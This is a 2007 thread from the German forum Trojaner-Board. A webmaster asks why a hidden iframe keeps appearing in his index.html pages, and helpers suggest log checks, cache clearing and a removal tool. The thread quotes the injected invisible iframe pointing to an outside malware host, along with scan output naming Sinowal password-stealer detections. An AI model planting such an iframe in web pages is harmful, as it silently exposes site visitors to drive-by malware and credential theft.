Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   iframe Virus schreibt sich in index.html Seiten (https://www.trojaner-board.de/38616-iframe-virus-schreibt-index-html-seiten.html)

mechagodzilla 05.05.2007 07:44

iframe Virus schreibt sich in index.html Seiten
 
Hallo, ich habe bemerkt, dass sich bei Anklicken einiger von mir erstellten Internetseiten folgender Code hinter den Body-Tag geschrieben hat und sich dieser bei Aufruf der Seiten im Internet aktivieren will:

<iframe src='http://quickcnt.com/ld/axhst/' width='1' height='1' style='visibility: hidden;'></iframe>

Mein Kaspersky im Büro meldet mir ebenso einen Trojaner, wie mein ZoneAlarm zuhause.

Gebaut habe ich die Seiten am Büro-PC, dieser ist laut Kaspersky 6 aber nicht infiziert.

Wenn ich den schädlichen Code aus der Seite lösche ist alles wieder gut.
Der Code schreibt sich nur in die Startseite, und nicht in andere, die ich verändert habe.

Woran kann das liegen, und was kann ich dagegen tun?

Vielen Dank, Marcus

Apocalypt 05.05.2007 08:10

Zitat:

Zitat von mechagodzilla (Beitrag 266582)

Mein Kaspersky im Büro meldet mir ebenso einen Trojaner, wie mein ZoneAlarm zuhause.

Was genau melden die wo?!

mechagodzilla 05.05.2007 08:37

Meine ZoneAlarm Meldung:
http://www.mechagodzilla.de/zonealarm.jpg

Apocalypt 05.05.2007 08:50

Jetzt wären noch die genauen Dateipfade und Namen intressant denn die kann man deiner Grafik nicht entnehmen ;)

Dan noch ein
http://www.trojaner-board.de/17493-a...ijackthis.html

mechagodzilla 05.05.2007 09:00

sorry, hier das Bild auch ganz :)
http://www.mechagodzilla.de/zonealarm2.jpg

Hijack hat nichts gefährliches gefunden

Apocalypt 05.05.2007 09:02

Das ist merkwürdig, vielleicht ein Fehlalarm, lad die Dateien mal bei Virustotal hoch.

Apocalypt 05.05.2007 09:08

Hab ich noch vergessen: Poste das Logfile von HJT ;)

mechagodzilla 05.05.2007 09:12

auch negativ, findet nichts. Aber wie kann sich Code in eine HTML-Seite einschreiben und speichern, sodass jeder User die Virenmeldung bekommt?

mechagodzilla 05.05.2007 09:16

hier das Logfile (habe ich auch schon auf der hijack Seite gecheckt)

Rene-gad 05.05.2007 09:17

Zitat:

Zitat von mechagodzilla (Beitrag 266582)
Vielen Dank, Marcus

...Ahm, sorry, aber wer ist denn Britta? Nämlich sie soll sich einloggen und den Ordner Temporary Internet Files in ihrem Profil leeren: Löschen des Inhalt des Ordners "Temporary Internet Files"

raman 05.05.2007 09:22

Durch den Downloader wird dir eine Sinowal Variante untergeschoben. Combofix kann diese sehr gut loeschen.
F:\gioPool\ibm00004.dll.vir
[FUND] Ist das Trojanische Pferd TR/PSW.Sinowal.CP.5
[WARNUNG] Die Datei wurde ignoriert.
F:\gioPool\ibm00003.dll.vir
[FUND] Ist das Trojanische Pferd TR/PSW.Sinowal.CP.7
[WARNUNG] Die Datei wurde ignoriert.
F:\gioPool\a.exe.vir
[FUND] Ist das Trojanische Pferd TR/Obfuscated.FV.6
[WARNUNG] Die Datei wurde ignoriert.

mechagodzilla 05.05.2007 09:31

Britta ist meine Frau, meinst du, sie ist der Virus? :Boogie:

Temporary Internet Files habe ich gelöscht. Ist mir trotzdem ein Rätsel, wie diese HTML-Code Änderungen passieren konnte....

Rene-gad 05.05.2007 09:47

Zitat:

Zitat von mechagodzilla (Beitrag 266599)
meinst du, sie ist der Virus?

Das kann ich aus der Ferne schlecht beurteilen :D. Was ich im Bild sehe - das Problem wurde aus ihrem IE-Profil gemeldet.
Zitat:

Temporary Internet Files habe ich gelöscht.
Im Profil deiner Frau - auch? ;)
Zitat:

Ist mir trotzdem ein Rätsel, wie diese HTML-Code Änderungen passieren konnte....
Alles hängt vom Verhalten des Benutzers und den Einstellungen der Programme, die im Internet gehen dürfen.


Alle Zeitangaben in WEZ +1. Es ist jetzt 03:27 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131